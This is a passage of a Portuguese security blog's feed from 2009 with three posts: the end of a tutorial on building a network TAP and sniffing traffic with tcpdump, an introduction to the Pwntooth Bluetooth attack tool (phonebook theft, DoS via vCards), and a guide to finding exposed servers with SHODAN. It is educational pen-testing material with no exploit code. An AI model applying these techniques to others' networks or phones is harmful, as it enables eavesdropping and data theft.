/&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/Syj63DpWgZI/AAAAAAAAACM/vFxHVIDbcHc/s1600-h/6.jpg"&gt;&lt;span style="font-family:arial;"&gt;&lt;img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 320px; DISPLAY: block; HEIGHT: 240px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5415854375691518354" border="0" alt="" src="http://1.bp.blogspot.com/_fzuc26ZLs28/Syj63DpWgZI/AAAAAAAAACM/vFxHVIDbcHc/s320/6.jpg" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="font-family:arial;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/Syj6-MeqdNI/AAAAAAAAACU/cDXT04Ojhi4/s1600-h/7.jpg"&gt;&lt;span style="font-family:arial;"&gt;&lt;img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 320px; DISPLAY: block; HEIGHT: 240px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5415854498321691858" border="0" alt="" src="http://1.bp.blogspot.com/_fzuc26ZLs28/Syj6-MeqdNI/AAAAAAAAACU/cDXT04Ojhi4/s320/7.jpg" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="font-family:arial;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/Syj7ErmoYjI/AAAAAAAAACc/-yex-b2gXY4/s1600-h/1-8.jpg"&gt;&lt;span style="font-family:arial;"&gt;&lt;img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 320px; DISPLAY: block; HEIGHT: 240px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5415854609755824690" border="0" alt="" src="http://1.bp.blogspot.com/_fzuc26ZLs28/Syj7ErmoYjI/AAAAAAAAACc/-yex-b2gXY4/s320/1-8.jpg" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="font-family:arial;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/Syj7Ov6sD9I/AAAAAAAAACk/Br_SAFkvW80/s1600-h/9.png"&gt;&lt;span style="font-family:arial;"&gt;&lt;img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 320px; DISPLAY: block; HEIGHT: 241px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5415854782712385490" border="0" alt="" src="http://1.bp.blogspot.com/_fzuc26ZLs28/Syj7Ov6sD9I/AAAAAAAAACk/Br_SAFkvW80/s320/9.png" /&gt; &lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;&lt;span style="font-family:arial;"&gt;Dependendo da sua criatividade, dá pra deixar mais elegante este dispositivo, mais a princípio, não vem ao caso.&lt;br /&gt;Pronto, acabamos o TAP.&lt;br /&gt;&lt;br /&gt;&lt;em&gt;Qualquer dúvida em relação à criação do TAP, entrar em contato pelo meu e-mail que ajudarei com o mesmo.&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;Utilizamos aqui 2 placas de rede, um para cada sentido do tráfego.&lt;br /&gt;Vamos agora configurar as interfaces de rede eth0 e eth1 para que elas se tornem uma única interface lógica, chamaremos a nova interface de &lt;strong&gt;bond0&lt;/strong&gt;. Usaremos um recurso do Linux que se chama &lt;strong&gt;Bonding&lt;/strong&gt;, para criar a tal interface.&lt;br /&gt;&lt;br /&gt;Obs.: Precisamos ter instalado na máquina o pacote ifenslave, para isso basta:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;# apt-get install ifenslave&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Vamos agora configurar as 2 interfaces.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family:arial;"&gt;&lt;strong&gt;# modprobe bonding&lt;br /&gt;# ip addr add 192.168.0.254/24 brd + dev bond0&lt;br /&gt;# ifconfig eth0 promisc -arp up&lt;br /&gt;# ifconfig eth1 promisc -arp up&lt;br /&gt;# ifconfig bond0 promisc -arp up&lt;br /&gt;# ifenslave bond0 eth0&lt;br /&gt;# ifenslave bond0 eth1&lt;br /&gt;# ifconfig&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;a href="http://2.bp.blogspot.com/_fzuc26ZLs28/Syj_HJifWiI/AAAAAAAAAC0/BPGzW6wEn1A/s1600-h/10.png"&gt;&lt;span style="font-family:arial;"&gt;&lt;img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 320px; DISPLAY: block; HEIGHT: 154px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5415859050197768738" border="0" alt="" src="http://2.bp.blogspot.com/_fzuc26ZLs28/Syj_HJifWiI/AAAAAAAAAC0/BPGzW6wEn1A/s320/10.png" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="font-family:arial;"&gt;&lt;br /&gt;&lt;br /&gt;Veja que aparece uma nova interface (bond0).&lt;br /&gt;Ok, interfaces configuradas.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;A hora do TCPDUMP:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;O &lt;em&gt;tcpdump&lt;/em&gt; é um sniffer muito conhecido e utilizado pelos profissionais de TI em suas diversas áreas. Tcpdump mostra uma descrição do conteúdo dos pacotes em uma interface de rede em tempo real. Vejamos mais de perto como funciona:&lt;br /&gt;Estando no micro com o &lt;strong&gt;BackTrack&lt;/strong&gt;, basta abrir um terminal e digitar o comando:&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family:arial;"&gt;&lt;strong&gt;# tcpdump –i bond0 –vv&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;-i&lt;/strong&gt; para especificar a interface&lt;br /&gt;&lt;strong&gt;bond0&lt;/strong&gt; é a interface lógica que criamos&lt;br /&gt;&lt;strong&gt;-vv&lt;/strong&gt; de verbose, para mostrar tudo na tela conforme for capturando o tráfego.&lt;br /&gt;&lt;br /&gt;Assim, ele vai capturando tudo o que passar pela interface específicada (bond0) e apresentar os resultados na tela. Quanta imaginação dá pra usar agora heim!!!&lt;br /&gt;Poderá também, salvar o log gerado pelo tcpdump em um arquivo e depois analisá-lo com algum programa de interface mais amigável, como por exemplo, o Wireshark.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Alguns comentários extras:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Existe a possibilidade de construir o TAP utilizando apenas uma interface de TAP, ou seja, ao invés de usarmos 4 conectores, usamos apenas 3, fica para um possível estudo ou caso queiram poderei criar um novo tutorial passo-a-passo e postar.&lt;br /&gt;Não entrei em muitos detalhes, sei que em algumas partes o conteúdo está vago, então por isso, espero as perguntas.&lt;br /&gt;Em uma continuação futura, mostrarei algumas técnicas de sniffing utilizando nosso TAP, como captura de tráfego SSL / HTTPS, entre outros.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;em&gt;&lt;span style="font-family:arial;"&gt;Obs.: Volto a lembrá-los, este tutorial é para fins didáticos, não é uma solução para sua empresa em produção, etc...&lt;/span&gt;&lt;br /&gt;&lt;/em&gt;&lt;br /&gt;&lt;strong&gt;Referências:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;NETWORK TAP;&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://en.wikipedia.org/wiki/Network_tap"&gt;http://en.wikipedia.org/wiki/Network_tap&lt;/a&gt;&lt;br /&gt;&lt;strong&gt;Sniffing&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://pt.wikipedia.org/wiki/Sniffing"&gt;http://pt.wikipedia.org/wiki/Sniffing&lt;/a&gt;&lt;br /&gt;&lt;strong&gt;Create a passive network tap for your home network;&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://thnetos.wordpress.com/2008/02/22/create-a-passive-network-tap-for-your-home-network/"&gt;http://thnetos.wordpress.com/2008/02/22/create-a-passive-network-tap-for-your-home-network/&lt;/a&gt;&lt;br /&gt;&lt;strong&gt;Linux Ethernet Bonding Driver Mini-Howto;&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://www.kernel.org/pub/linux/kernel/people/marcelo/linux-2.4/Documentation/networking/bonding.txt"&gt;http://www.kernel.org/pub/linux/kernel/people/marcelo/linux-2.4/Documentation/networking/bonding.txt&lt;/a&gt;&lt;br /&gt;&lt;strong&gt;TCPDUMP;&lt;br /&gt;&lt;/strong&gt;&lt;a href="http://www.tcpdump.org/"&gt;http://www.tcpdump.org/&lt;/a&gt;&lt;br /&gt;&lt;strong&gt;Wireshark;&lt;br /&gt;&lt;/strong&gt;&lt;a href="http://www.wireshark.org/"&gt;http://www.wireshark.org/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Questions?&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;---------------------------------------------------&lt;/strong&gt;&lt;br /&gt;Roberto Soares (&lt;strong&gt;3spreto&lt;/strong&gt;)&lt;br /&gt;robertoespreto@gmail.com&lt;br /&gt;espreto@backtrack.com.br&lt;br /&gt;http://codesec.blogspot.com/&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;®&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3387717746309894142-8247493709516962060?l=codesec.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://codesec.blogspot.com/feeds/8247493709516962060/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://codesec.blogspot.com/2009/12/vai-farejar-aqui-tap-na-cara-dele.html#comment-form' title='2 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/8247493709516962060'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/8247493709516962060'/><link rel='alternate' type='text/html' href='http://codesec.blogspot.com/2009/12/vai-farejar-aqui-tap-na-cara-dele.html' title='Vai farejar aqui? (TAP na cara dele!)'/><author><name>Roberto dos Santos Soares (espreto)</name><uri>http://www.blogger.com/profile/17178261473696242751</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_fzuc26ZLs28/Sw8wj5YvVYI/AAAAAAAAAAM/d9P6GREunBw/S220/Roberto.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_fzuc26ZLs28/Syj3YNS-IgI/AAAAAAAAABk/dtzX5jzHw2c/s72-c/16-12-09_1132.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3387717746309894142.post-6942880514474294257</id><published>2009-12-02T01:49:00.013-02:00</published><updated>2009-12-02T02:24:31.016-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Pwntooth'/><category scheme='http://www.blogger.com/atom/ns#' term='Pen testing'/><category scheme='http://www.blogger.com/atom/ns#' term='Bluetooth Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Bluetooth'/><title type='text'>Pwntooth - Pen Testing em dispositivos Bluetooth</title><content type='html'>Pwntooth (pown-tootn) foi projetado para automatizar o processo de Pen Testing em dispositivos Bluetooth. Ele faz a varredura dos dispositivos e, em seguida, executa as ferramentas específicadas no arquivo pwntooth.conf. Incluindo blueper, bluesnarfer, Bluetooth Stack Smacher (BSS), carwhisperer, psm_scan, rfcomm_scan e vcardblaster.&lt;br /&gt;&lt;br /&gt;Detalhes das ferramentas incluídas no Pwntooth:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;strong&gt;Blueper:&lt;/strong&gt; Blueper é uma ferramenta desenhada para a transferência de arquivos via Bluetooth. Esta ferramenta pode causar vários resultados “incômodos”, incluindo; pop-ups, pedidos contínuos de transferência de arquivos, gravação de dados em um disco remoto, ou trancar/quebrar (lógicamente) alguns dispositivos.&lt;/blockquote&gt;&lt;blockquote&gt;&lt;strong&gt;Bluesnarfer:&lt;/strong&gt; Esta ferramenta irá baixar a lista telefônica de qualquer dispositivo móvel vulnerável a bluesnarfing.&lt;/blockquote&gt;&lt;blockquote&gt;&lt;strong&gt;Bluetooth Stack Smasher (BSS):&lt;/strong&gt; É um difusor de camada L2CAP.&lt;/blockquote&gt;&lt;blockquote&gt;&lt;strong&gt;Carwhisperer:&lt;/strong&gt; O projeto carwhisperer pretende alertar os fabricantes de kits Bluetooth e outros aparelhos que utilizam a tecnologia Bluetooth, para a evolução da ameaça à segurança da utilização de chaves de acesso padrão.&lt;/blockquote&gt;&lt;blockquote&gt;&lt;strong&gt;Psm_scan:&lt;/strong&gt; É um port scanner que relata apenas se um canal PSM (Service Protocol Multiplexers) está aberta ou fechada. Além disso, suporta a digitalização usando sockets RAW para recolher um pouco mais de informações sobre o estado do PSM.&lt;/blockquote&gt;&lt;blockquote&gt;&lt;strong&gt;Rfcomm_scan:&lt;/strong&gt; Também é um port scanner, relata apenas se um canal RFCOMM está aberto ou fechado.&lt;/blockquote&gt;&lt;blockquote&gt;&lt;p&gt;&lt;strong&gt;Vcardblaster:&lt;/strong&gt; É uma ferramenta utilizada para abusar do envio de cartões de visita através do Bluetooth. Ele permite enviar ao usuário um fluxo contínuo de vCards para tentar um possível ataque DoS Bluetooth ou deixar os recursos do dispositivo indisponível momentaneamente.&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;/blockquote&gt;Pwntooth é uma ferramenta totalmente automatizada, tipo “Procurar e destruir”. Indicada para usuários avançados que desejam executar uma série de testes contra cada dispositivo em específico na área. Embora haja algumas linha pré-configuradas no arquivo pwntooth.conf, é preferível que os usuários especifiquem a sua própria configuração, agilizando o processo no seu Pen Test.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Instalação:&lt;/strong&gt;&lt;br /&gt;Baixe o arquivo pwntooth-0.2.2.tar.gz (Ultima versão até então) e descompacte-o.&lt;br /&gt;&lt;br /&gt;Entre no diretório criado e execute os seguintes passos:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;# make&lt;/strong&gt; -&gt; Para compilar os binários.&lt;br /&gt;&lt;strong&gt;# make install&lt;/strong&gt; -&gt; Para instalar no sistema.&lt;br /&gt;&lt;strong&gt;# make clean&lt;/strong&gt; -&gt; Para apagar os binários do diretório pwntooth.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Ferramentas Adicionais:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Entre no diretório “tools” dentro do diretório pwntooth recém criado e repita os 3 passos demonstrados acima.&lt;br /&gt;&lt;br /&gt;Sintaxe de Uso:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;# pwntooth [-l logfile] [-s script] [-t addr]&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Opções:&lt;br /&gt;&lt;blockquote&gt;-h : Ajuda&lt;br /&gt;-l : Arquivo para gerar os resultados de log&lt;br /&gt;-n : Números de scans antes de parar&lt;br /&gt;-s : Localização e nome do script. Padrão: pwntooth.conf&lt;br /&gt;-t : Endereço único do dispositivo alvo. Formato XX:XX:XX:XX:XX:XX&lt;/blockquote&gt;&lt;strong&gt;Dicas:&lt;/strong&gt;&lt;br /&gt;Sugiro que visualizem o conteúdo do arquivo de configuração pwntooth.conf, existe várias opções a serem descomentadas. Caso saiba, poderá incluir suas próprias configurações no arquivo de configuração.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Referência:&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://www.hackfromacave.com/pwntooth.html"&gt;http://www.hackfromacave.com/pwntooth.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Abraços!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3387717746309894142-6942880514474294257?l=codesec.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://codesec.blogspot.com/feeds/6942880514474294257/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://codesec.blogspot.com/2009/12/pwntooth-pen-testing-em-dispositivos.html#comment-form' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/6942880514474294257'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/6942880514474294257'/><link rel='alternate' type='text/html' href='http://codesec.blogspot.com/2009/12/pwntooth-pen-testing-em-dispositivos.html' title='Pwntooth - Pen Testing em dispositivos Bluetooth'/><author><name>Roberto dos Santos Soares (espreto)</name><uri>http://www.blogger.com/profile/17178261473696242751</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_fzuc26ZLs28/Sw8wj5YvVYI/AAAAAAAAAAM/d9P6GREunBw/S220/Roberto.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3387717746309894142.post-1140907119152813115</id><published>2009-11-27T00:03:00.012-02:00</published><updated>2009-11-28T13:17:16.351-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SHODAN'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidade'/><category scheme='http://www.blogger.com/atom/ns#' term='Computer Search Engine'/><title type='text'>SHODAN - Computer Search Engine</title><content type='html'>Estava eu, em minhas leituras diárias em busca de expansão cerebral, quando li alguns rumores desta nova opção de busca por Servidores Web e etc, por sinal, EXCELENTE! Fica a dica para testarem.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_fzuc26ZLs28/Sw81p4HtWnI/AAAAAAAAAA4/uFIK9T_Br3w/s1600/01.PNG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 122px;" src="http://2.bp.blogspot.com/_fzuc26ZLs28/Sw81p4HtWnI/AAAAAAAAAA4/uFIK9T_Br3w/s400/01.PNG" border="0" alt=""id="BLOGGER_PHOTO_ID_5408600671050881650" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;SHODAN permite encontrar servidores/roteadores/etc, usando uma simples caixa de pesquisa, parecida com a caixa de busca do google. A maioria dos dados, no índice, abrange servidores da Web no momento, mas há alguns dados sobre FTP, Telnet e serviços, bem como o SSH. Vamos ver a capacidade do software e o que descobrimos em sua pesquisa.&lt;br /&gt;&lt;br /&gt;Vamos dizer que você quer encontrar servidores executando o daemon "Apache". Uma simples tentativa seria usar:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Apache&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Assim como abaixo:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_fzuc26ZLs28/Sw81zG2irVI/AAAAAAAAABA/r6Q-RXDh3JU/s1600/02.PNG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 293px;" src="http://4.bp.blogspot.com/_fzuc26ZLs28/Sw81zG2irVI/AAAAAAAAABA/r6Q-RXDh3JU/s320/02.PNG" border="0" alt=""id="BLOGGER_PHOTO_ID_5408600829624233298" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Então agora, vamos encontrar apenas os servidores Apache rodando a versão 2.2.3? Não. Ah, fica aí então, eu vou! Let´s go!&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Apache 2.2.3&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Como mostrado abaixo:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_fzuc26ZLs28/Sw82C6OzF1I/AAAAAAAAABI/p0QEY4SJDHo/s1600/03.PNG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 294px;" src="http://4.bp.blogspot.com/_fzuc26ZLs28/Sw82C6OzF1I/AAAAAAAAABI/p0QEY4SJDHo/s320/03.PNG" border="0" alt=""id="BLOGGER_PHOTO_ID_5408601101114218322" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Você também pode diminuir os resultados, ou seja, refinar as buscas, utilizando os parâmetros de pesquisa que segue abaixo:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;country:&lt;/strong&gt; As 2 letras referente ao país. (Não me refiro a dança country! :P)&lt;br /&gt;&lt;strong&gt;hostname:&lt;/strong&gt; Nome total ou parcial do host (hostname).&lt;br /&gt;&lt;strong&gt;port:&lt;/strong&gt; 21, 22, 23 ou 80.&lt;br /&gt;&lt;br /&gt;Por exemplo: Obter todos (Disse todos? :| ) os webservers (port: 80) que funcionam o "apache" no Brasil (country: BR):&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Apache country:BR port:80&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Veja os resultados:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/Sw82MDHvJXI/AAAAAAAAABQ/9PTxh2Ntw0A/s1600/04.PNG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 294px;" src="http://1.bp.blogspot.com/_fzuc26ZLs28/Sw82MDHvJXI/AAAAAAAAABQ/9PTxh2Ntw0A/s320/04.PNG" border="0" alt=""id="BLOGGER_PHOTO_ID_5408601258119341426" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;Divirta-se com o SHODAN. Após os resultados, seguir em frente é por sua conta. Fica o alerta aos administradores de redes/sistemas.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Instalando o SHODAN no Firefox:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Segue o link para download.&lt;br /&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/51663"&gt;https://addons.mozilla.org/en-US/firefox/addon/51663&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_fzuc26ZLs28/Sw82T2nBpQI/AAAAAAAAABY/WBWoApbKAwE/s1600/05.PNG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 294px;" src="http://2.bp.blogspot.com/_fzuc26ZLs28/Sw82T2nBpQI/AAAAAAAAABY/WBWoApbKAwE/s320/05.PNG" border="0" alt=""id="BLOGGER_PHOTO_ID_5408601392199869698" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;SHODAN conta com uma interface amigável para filtros de pesquisa (país, hostname, etc.), também fornece links úteis para websites relevantes para a investigação de segurança. Após a instalação, vá para: "Ferramentas (Tools) -&gt; Shodan" para ativá-lo.&lt;br /&gt;&lt;br /&gt;Referências:&lt;br /&gt;&lt;br /&gt;Site do Projeto:&lt;br /&gt;&lt;a href="http://shodan.surtri.com/"&gt;http://shodan.surtri.com/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Abraços.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3387717746309894142-1140907119152813115?l=codesec.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://codesec.blogspot.com/feeds/1140907119152813115/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://codesec.blogspot.com/2009/11/shodan-computer-search-engine.html#comment-form' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/1140907119152813115'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/1140907119152813115'/><link rel='alternate' type='text/html' href='http://codesec.blogspot.com/2009/11/shodan-computer-search-engine.html' title='SHODAN - Computer Search Engine'/><author><name>Roberto dos Santos Soares (espreto)</name><uri>http://www.blogger.com/profile/17178261473696242751</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_fzuc26ZLs28/Sw8wj5YvVYI/AAAAAAAAAAM/d9P6GREunBw/S220/Roberto.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_fzuc26ZLs28/Sw81p4HtWnI/AAAAAAAAAA4/uFIK9T_Br3w/s72-c/01.PNG' height='72' width='72'/><thr:total>0</thr:total></entry></feed>
